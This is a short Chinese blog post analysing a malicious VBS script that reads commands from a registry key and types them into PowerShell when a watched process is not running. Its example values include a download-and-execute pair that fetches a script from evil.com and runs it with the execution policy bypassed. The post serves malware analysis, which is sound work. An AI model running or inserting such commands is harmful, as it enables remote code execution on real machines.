IAPqYhYQsmEZnvh.vbs文件分析

by Back
on 2 7 月, 2025

vbs是一种简单的脚本文件,内部的代码用记事本就可以看

其执行的逻辑为

根据注册表进行操作

假设以下注册表的内容

HKEY_CURRENT_USER\Software\IAPqYhYQsmEZnvh\
i = “notepad.exe”
in = “0”
v = “Invoke-WebRequest http://evil.com/a.ps1 -OutFile C:\a.ps1”
cn = “powershell -ExecutionPolicy Bypass -File C:\a.ps1”

那么这段脚本干的事就是:

  1. 如果 notepad.exe 没运行,
  2. 它就启动 PowerShell,
  3. 自动在 PowerShell 中输入:Invoke-WebRequest http://evil.com/a.ps1 -OutFile C:\a.ps1 powershell -ExecutionPolicy Bypass -File C:\a.ps1
  4. 然后按回车,让它执行这些命令。

而根据压缩包里的文件来看

这个脚本文件要找的exe应该就是MSBuild.exe

Categories:

逆向

Tags:

No Tag

No responses yet

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注